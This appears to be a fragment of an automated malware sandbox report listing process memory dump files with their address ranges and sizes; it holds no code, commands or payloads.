• memory/2424-223-0x0000000000400000-0x00000000004CC000-memory.dmp    Filesize 816KB
• memory/2448-514-0x00000189E8F60000-0x00000189E8FD2000-memory.dmp    Filesize 456KB
• memory/2488-503-0x0000021B5D410000-0x0000021B5D482000-memory.dmp    Filesize 456KB
• memory/2660-483-0x0000021684270000-0x00000216842BD000-memory.dmp    Filesize 308KB
• memory/2660-500-0x0000021684C00000-0x0000021684C72000-memory.dmp    Filesize 456KB
• memory/2764-595-0x000001CB03260000-0x000001CB032D2000-memory.dmp    Filesize 456KB
• memory/2792-616-0x0000013753410000-0x0000013753482000-memory.dmp    Filesize 456KB
• memory/2932-316-0x0000000001150000-0x0000000001151000-memory.dmp    Filesize 4KB
• memory/2932-305-0x0000000000940000-0x0000000000941000-memory.dmp    Filesize 4KB
• memory/3056-286-0x0000000000E00000-0x0000000000E16000-memory.dmp    Filesize 88KB
• memory/3168-620-0x0000000000F70000-0x0000000000FB5000-memory.dmp    Filesize 276KB
• memory/3304-262-0x0000000000400000-0x00000000004CC000-memory.dmp    Filesize 816KB
• memory/3456-206-0x0000000000310000-0x0000000000311000-memory.dmp    Filesize 4KB
• memory/3456-203-0x0000000000310000-0x0000000000311000-memory.dmp    Filesize 4KB
• memory/3700-186-0x00000000009F0000-0x00000000009F1000-memory.dmp    Filesize 4KB
• memory/3700-182-0x00000000009F0000-0x00000000009F1000-memory.dmp    Filesize 4KB
• memory/3708-167-0x0000000000B00000-0x0000000000B01000-memory.dmp    Filesize 4KB
• memory/3708-195-0x0000000001190000-0x0000000001192000-memory.dmp    Filesize 8KB
• memory/3932-248-0x0000000000400000-0x0000000000450000-memory.dmp    Filesize 320KB
• memory/3932-230-0x0000000000400000-0x0000000000450000-memory.dmp    Filesize 320KB
• memory/3956-147-0x0000000064940000-0x0000000064959000-memory.dmp    Filesize 100KB
• memory/3956-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp    Filesize 1.5MB
• memory/3956-150-0x0000000064940000-0x0000000064959000-memory.dmp    Filesize 100KB
• memory/3956-156-0x0000000064940000-0x0000000064959000-memory.dmp    Filesize 100KB
• memory/3956-153-0x0000000064940000-0x0000000064959000-memory.dmp    Filesize 100KB
• memory/3956-134-0x000000006B440000-0x000000006B4CF000-memory.dmp    Filesize 572KB
• memory/3956-141-0x000000006B280000-0x000000006B2A6000-memory.dmp    Filesize 152KB
• memory/3956-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp    Filesize 1.5MB
• memory/3956-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp    Filesize 1.5MB
• memory/3956-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp    Filesize 1.5MB
• memory/3956-136-0x000000006B440000-0x000000006B4CF000-memory.dmp    Filesize 572KB
• memory/3956-135-0x000000006B440000-0x000000006B4CF000-memory.dmp    Filesize 572KB
• memory/4104-368-0x00000000057C0000-0x0000000005DC6000-memory.dmp    Filesize 6.0MB
• memory/4104-321-0x0000000000400000-0x0000000000420000-memory.dmp    Filesize 128KB
• memory/4116-366-0x00000000053B0000-0x00000000059B6000-memory.dmp    Filesize 6.0MB
• memory/4288-322-0x0000000000800000-0x00000000009CF000-memory.dmp    Filesize 1.8MB
• memory/4288-373-0x0000000005730000-0x0000000005731000-memory.dmp    Filesize 4KB
• memory/4288-315-0x0000000002B40000-0x0000000002B85000-memory.dmp    Filesize 276KB
• memory/4288-319-0x0000000000800000-0x00000000009CF000-memory.dmp    Filesize 1.8MB
• memory/4356-511-0x000001E025470000-0x000001E0254E2000-memory.dmp    Filesize 456KB
• memory/4416-397-0x0000000003940000-0x0000000003941000-memory.dmp    Filesize 4KB

                                                                                                                                                                                                                      • memory/4416-351-0x0000000001670000-0x00000000016B5000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        276KB

                                                                                                                                                                                                                      • memory/4500-398-0x00000000019C0000-0x00000000019C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4856-540-0x000000002F8B0000-0x000000002F965000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        724KB

                                                                                                                                                                                                                      • memory/4856-534-0x000000002F730000-0x000000002F7E7000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        732KB

                                                                                                                                                                                                                      • memory/4856-475-0x0000000002B80000-0x0000000002B81000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4912-414-0x000000001AE50000-0x000000001AE52000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/5116-485-0x0000000004CF0000-0x0000000004D4D000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        372KB

                                                                                                                                                                                                                      • memory/5116-482-0x0000000004D96000-0x0000000004E97000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.0MB